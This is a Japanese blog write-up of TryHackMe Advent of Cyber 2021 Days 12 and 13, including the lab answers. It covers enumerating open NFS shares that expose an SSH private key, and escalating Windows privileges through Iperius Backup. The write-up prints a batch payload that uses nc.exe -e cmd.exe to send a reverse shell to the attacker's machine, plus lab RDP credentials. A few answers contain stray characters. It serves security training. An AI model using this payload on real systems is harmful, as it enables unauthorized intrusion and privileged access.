【TryHackMe】Advent of Cyber3 (2021)を続けてみた Day12, 13

Welcome to Advent of Cyber 2021

クリスマスまでの25日間、毎日基本的な知識を学び、初心者向けの新しいセキュリティ演習を行うことで、サイバーセキュリティを始めることができます。

day12

ネットワークファイルシステム（NFS）は、異なるコンピューター間でファイルを転送する機能を可能にするプロトコルです。
NFSサービスがリッスンしていることがわかったので、共有されているファイルを確認しましょう。

┌──(kali㉿kali)-[~]
└─$ showmount -e 10.10.228.187
Export list for 10.10.228.187:
/share        (everyone)
/admin-files  (everyone)
/my-notes     (noone)
/confidential (everyone)

発見したシェアをマウントしてみましょう。
まず、ローカルにtmp1を作成します。そのあと、mountコマンドを使用します。このときsudoを忘れないようにしましょう。

┌──(kali㉿kali)-[~]
└─$ sudo mount 10.10.228.187:/share tmp1

md5sumコマンドを使用してハッシュ値を求める。ファイルやデータの中身が一つでも違うと全く違ったハッシュ値となるため、ファイルの偽造防止などに使われる。

┌──(kali㉿kali)-[~]
└─$ md5sum id_rsa
3e2d315a38f377f304f5598dc2f044de  id_rsa

Answer

Scan the target server with the IP MACHINE_IP. Remember that MS Windows hosts block pings by default, so we need to add -Pn, for example, nmap -Pn MACHINE_IP for the scan to work correctly. How many TCP ports are open?
7
In the scan results you received earlier, you should be able to spot NFS or mountd, depending on whether you used the -sV option with Nmap or not. Which port is detected by Nmap as NFS or using the mountd service?
2049
How many shares did you find?
4
How many shares show “everyone”?
3
What is the title of file 2680-0.txt?
XMeditations
It seems that Grinch Enterprises has forgotten their SSH keys on our system. One of the shares contains a private key used for SSH authentication (id_rsa). What is the name of the share?
confidential
We can calculate the MD5 sum of a file using md5sum FILENAME. What is the MD5 sum of id_rsa?
3e2d315a38f377f304f5598dc2f044de

day13

学習目標は以下３つです。

• Windowsのさまざまな種類のユーザー権限を理解する
• さまざまな特権昇格テクニック
• 特権昇格の脆弱性を悪用する

RDPします。

┌──(kali㉿kali)-[~]
└─$ xfreerdp /u:mcskidy /p:Password1 /w:1366 /h:768 +fonts +clipboard /v:10.10.68.49

初期情報収集

net users : ターゲットシステム上のユーザーを一覧表示します。

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" : オペレーティングシステムに関する情報を出力します。これは、このバージョンに特権昇格の脆弱性が存在するかどうかをさらに調査するために使用する必要があります。

sc query state= all | findstr /C:SERVICE_NAME /C:DISPLAY_NAME /C:STATE : ターゲットシステムにインストールされているサービスを一覧表示します

wmic service <サービス名> get DisplayName,name,PathName: Pathとかも分かる

Iperius Backup Serviceには、特権昇格の脆弱性があります。Iperius Backupをサービスとしてインストールすると、現在のユーザーの特権レベルが低い場合でも、管理者特権でバックアップタスクを実行するように構成できます。

1. 新しいバックアップタスクを作成します。タスク自体は重要ではありません。バックアップパスはC：\ Users \ McSkidy \ Documentsとして設定できます

6.1.0であることが分かったので、exploitコードがないか探します。（Iperius Backup Serviceには、特権昇格の脆弱性があります。）

1. 宛先の設定：[宛先]タブから、バックアップが書き​​込まれる場所を設定できます。繰り返しますが、これは重要ではありません。C：\ Users \ McSkidy \ Desktopに設定できます

1. その他のプロセス：[その他のプロセス]タブは重要です。ご覧のとおり、これにより、すべてのバックアッププロセスの前または後に実行するようにプログラムを設定するオプションが提供されます。バックアッププロセスは管理者権限で実行されるため、ここで構成されたプログラムまたは外部ファイルはすべて管理者権限で実行されます。

これを悪用するために、単純なbatファイルを作成し、バックアップの前に実行するように設定します。
.batファイルは、nc.exeユーティリティ（便利なC：\ Users \ McSkidy \ Downloads \ nc.exeにあります）を使用してシェルを起動します。メモ帳のテキストエディタを起動し、次のコード行を入力します。

@echo off
C:\Users\McSkidy\Downloads\nc.exe <自分IP> <port> -e cmd.exe

上記のファイルをexploit.batとして保存します。

1. リスナーを起動します。exploit.batファイルはcmd.exeを起動し、ポート5555で自分のマシンに接続し直します。この着信接続を受け入れる準備ができているリスナーが必要です。 ncを使用して、攻撃しているマシンで起動します nc -nlvp 5555

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 5555
listening on [any] 5555 ...

1. サービスとして実行：以前に作成した「ドキュメント」バックアップジョブを右クリックし、「サービスとしてバックアップを実行」オプションを選択します。
   

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.8.251.120] from (UNKNOWN) [10.10.68.49] 50109
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\Iperius Backup>whoami
the-grinch-hack\thegrinch

C:\Program Files (x86)\Iperius Backup>

これでシェルをとりました。

C:\Program Files (x86)\Iperius Backup>whoami
whoami
the-grinch-hack\thegrinch

Answer

Complete the username: p.....
pepper
What is the OS version?
10.0.17763 N/A Build 17763
What backup service did you find running on the system?
IperiusSvc
What is the path of the executable for the backup service you have identified?
XC:\Program Files (x86)\Iperius Backup\IperiusService.exe
Run the whoami command on the connection you have received on your attacking machine. What user do you have?
the-grinch-hack\thegrinch
What is the content of the flag.txt file?
THM-736635221
The Grinch forgot to delete a file where he kept notes about his schedule! Where can we find him at 5:30?
jazzercize